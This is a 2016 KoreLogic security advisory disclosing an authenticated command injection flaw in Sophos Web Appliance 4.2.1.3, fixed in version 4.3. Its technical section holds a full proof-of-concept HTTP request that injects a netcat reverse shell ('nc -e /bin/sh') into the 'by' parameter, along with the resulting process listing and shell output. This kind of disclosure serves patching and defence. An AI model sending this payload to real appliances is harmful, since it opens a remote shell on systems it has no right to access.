KL-001-2016-009 : Sophos Web Appliance Remote Code Execution

Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt


1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Apppliance
     Affected Version: v4.2.1.3
     Platform: Embedded Linux
     CWE Classification: CWE-78: Improper Neutralization of Special Elements
                         used in an OS Command ('OS Command Injection'),
                         CWE-88: Argument Injection or Modification
     Impact: Remote Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     An authenticated user of any privilege can execute arbitrary
     system commands as the non-root webserver user.

3. Technical Description

     Multiple parameters to the web interface are unsafely handled and
     can be used to run operating system commands, such as:

     POST /index.php?c=logs HTTP/1.1
     Host: [redacted]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
Gecko/20100101 Firefox/46.0
     Accept: text/javascript, text/html, application/xml, text/xml, */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.6.1
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Content-Length: 305
     Connection: close


STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1

     HTTP/1.1 200 OK
     Date: Tue, 10 May 2016 15:35:05 GMT
     Server: Apache
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
pre-check=0
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 207

     {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10
4:35
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}

     --

     The vulnerable parameters are: by, request_id, and txt_filter_domain

     That request launches the following process on the SWA:

     1000     16851  0.0  0.0   2728  1040 ?        S    15:43   0:00 sh -c
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
--start='2016/05/10' --end='2016/05/10' --action=''
--sid=590fca17b230e8cdba0394cfa28ef2eb

     From the shell launched via netcat:

     id;uname -a;uptime
     uid=1000(spiderman) gid=1000(spiderman)
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
     Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
     15:52:34 up  4:26,  0 users,  load average: 0.11, 0.12, 0.15

4. Mitigation and Remediation Recommendation

     The vendor has issued a fix for this vulnerability in Version
     4.3 of SWA. Release notes available at:

     http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
     2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
     2016.09.28 - KoreLogic requests status update.
     2016.09.28 - Sophos informs KoreLogic that an update including a fix
                  for this vulnerability will be available near the end
                  of October.
     2016.10.13 - Sophos informs KoreLogic that the update was released to a
                  limited customer base and is expected to be distributed
                  at-large over the following week.
     2016.11.03 - Public disclosure.

7. Proof of Concept

     See 3. Technical Description.


The contents of this advisory are copyright(c) 2016
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt